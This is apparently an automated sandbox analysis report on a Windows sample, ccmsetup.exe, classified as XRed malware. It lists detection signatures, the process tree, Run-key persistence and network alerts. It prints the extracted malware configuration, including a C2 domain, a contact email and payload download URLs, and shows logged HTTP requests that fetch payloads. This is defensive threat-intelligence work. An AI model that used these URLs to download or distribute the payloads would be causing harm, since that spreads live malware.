Windows Analysis Report
ccmsetup.exe

Overview

General Information

Sample name: ccmsetup.exe
Analysis ID: 1569604
MD5: 823444545911fd17e953437b7c712f2f
SHA1: 6d1c0b1c3caade86c13196a0763538d0ee29322e
SHA256: 845b6f57d33b26dd409ae897707e4a5141991df780983593965983d95c06c67d
Tags: exeZorexuser-malrpt
Infos:

Detection

XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Registers a new ROOT certificate
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ccmsetup.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\ccmsetup.exe" MD5: 823444545911FD17E953437B7C712F2F)
    • ._cache_ccmsetup.exe (PID: 3128 cmdline: "C:\Users\user\Desktop\._cache_ccmsetup.exe" MD5: 169E238A8E29445C319F934362361D28)
    • Synaptics.exe (PID: 2180 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 020E869138373254D25D50294CEB45AF)
      • WerFault.exe (PID: 8660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 8796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 9168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 1288 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 7292 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 020E869138373254D25D50294CEB45AF)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
ccmsetup.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
ccmsetup.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\Synaptics\RCXD7AF.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCXD7AF.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: ccmsetup.exe PID: 4512 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
Process Memory Space: Synaptics.exe PID: 2180 | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
0.0.ccmsetup.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.ccmsetup.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton | Data: DestinationIp: 13.107.246.63, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1288, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49965
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49965, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1288, Protocol: tcp, SourceIp: 13.107.246.63, SourceIsIpv6: false, SourcePort: 443
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ccmsetup.exe, ProcessId: 4512, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Local\Temp\aOkCiDht.xlsm

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T22:51:13.379912+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49965 | 13.107.246.63 | 443 | TCP
2024-12-05T22:51:28.669036+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49996 | 13.107.246.63 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T22:50:09.931417+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 69.42.215.252 | 80 | TCP

AV Detection

Source: ccmsetup.exe | Avira: detected
Source: http://xred.site50.net/syn/Synaptics.rarZ | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll6 | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniZ | Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\RCXD7AF.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXD7AF.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: ccmsetup.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCXD7AF.tmp | ReversingLabs: Detection: 92%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | ReversingLabs: Detection: 92%
Source: ccmsetup.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 82.7% probability
Source: C:\ProgramData\Synaptics\RCXD7AF.tmp | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Joe Sandbox ML: detected
Source: ccmsetup.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_0061A5A8 __EH_prolog3_catch,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptReleaseContext,2_2_0061A5A8
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_00628AA0 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,CertEnumCertificatesInStore,_memcmp,CryptDecodeObjectEx,CompareFileTime,CertFreeCertificateContext,CertDuplicateCertificateContext,GetLastError,GetCurrentThreadId,LocalFree,LocalFree,CertFreeCertificateContext,CertFreeCertificateContext,2_2_00628AA0
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_0061CB62 __EH_prolog3_catch,GetCurrentThreadId,CertFindExtension,GetCurrentThreadId,CryptDecodeObjectEx,GetLastError,GetCurrentThreadId,GetCurrentThreadId,LocalFree,2_2_0061CB62
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_00626EEF __EH_prolog3_catch,GetCurrentThreadId,CryptAcquireCertificatePrivateKey,GetLastError,GetCurrentThreadId,2_2_00626EEF
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_0062706A __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,_memmove,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,CryptDecodeObject,CryptDecodeObject,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CryptDecodeObject,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,_memmove,GetCurrentThreadId,_memmove,GetCurrentThreadId,CertStrToNameW,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertFindCertificateInStore,CompareFileTime,CertFreeCertificateContext,CertDuplicateCertificateContext,GetLastError,GetCurrentThreadId,CoTaskMemFree,CertFreeCertificateContext,CertFreeCertificateContext,2_2_0062706A
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_0062567E __EH_prolog3_catch,GetCurrentThreadId,CryptVerifyCertificateSignatureEx,GetLastError,GetCurrentThreadId,2_2_0062567E
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_0065788B __EH_prolog3_catch,CryptProtectData,GetLastError,CryptUnprotectData,2_2_0065788B
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Code function: 2_2_006339EA __EH_prolog3_catch,GetCurrentThreadId,CryptReleaseContext,GetLastError,GetCurrentThreadId,GetCurrentThreadId,2_2_006339EA
Source: ccmsetup.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | File created: C:\Windows\ccmsetup\Logs\ccmsetup.log
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb} source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\._cache_ccmsetup.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: ccmsetup.exe | Binary or memory string: [autorun]
Source: ccmsetup.exe | Binary or memory string: autorun.inf
Source: RCXD7AF.tmp.0.dr | Binary or memory string: [autorun]
Source: RCXD7AF.tmp.0.dr | Binary or memory string: autorun.inf
Source: Synaptics.exe.0.dr | Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr | Binary or memory string: autorun.inf
Source: ~$cache1.3.dr | Binary or memory string: [autorun]
Source: ~$cache1.3.dr | Binary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_0057E422 __EH_prolog3_catch_GS,FindFirstFileW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,2_2_0057E422
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_005F2842 __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,DeleteFileW,GetFileInformationByHandle,GetCurrentThreadId,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,CopyFileW,GetLastError,GetCurrentThreadId,GetLastError,FindClose,2_2_005F2842
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_00589401 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,2_2_00589401
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_0060581F __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CopyFileW,GetLastError,GetCurrentThreadId,FindNextFileW,FindClose,2_2_0060581F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_00587953 __EH_prolog3_catch_GS,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,GetCurrentThreadId,2_2_00587953
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe; Code function: 2_2_0057DD9A __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,DeleteFileW,GetLastError,GetCurrentThreadId,FindClose,2_2_0057DD9A
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\ccmsetup.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

                              Networking

                              Source: Network traffic; Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49712 -> 69.42.215.252:80
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49729 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49721 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49720 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49746 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49708 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49756 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49757 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49772 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49804 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49802 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49824 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49864 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49794 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49825 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49747 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49894 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49863 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49844 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49882 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49892 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49911 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49845 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49707 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49883 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49793 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49910 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49728 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49771 -> 172.217.19.238:443
                              Source: Network traffic; Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49920 -> 172.217.19.238:443
                              Source: Malware configuration extractor; URLs: xred.mooo.com
                              Source: unknown; DNS query: name: freedns.afraid.org
                              Source: Joe Sandbox View; IP Address: 13.107.246.63
                              Source: Joe Sandbox View; IP Address: 69.42.215.252
                              Source: Joe Sandbox View; JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                              Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49965 -> 13.107.246.63:443
                              Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49996 -> 13.107.246.63:443
                              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic; HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                              Source: global traffic; HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                              Source: global traffic; HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
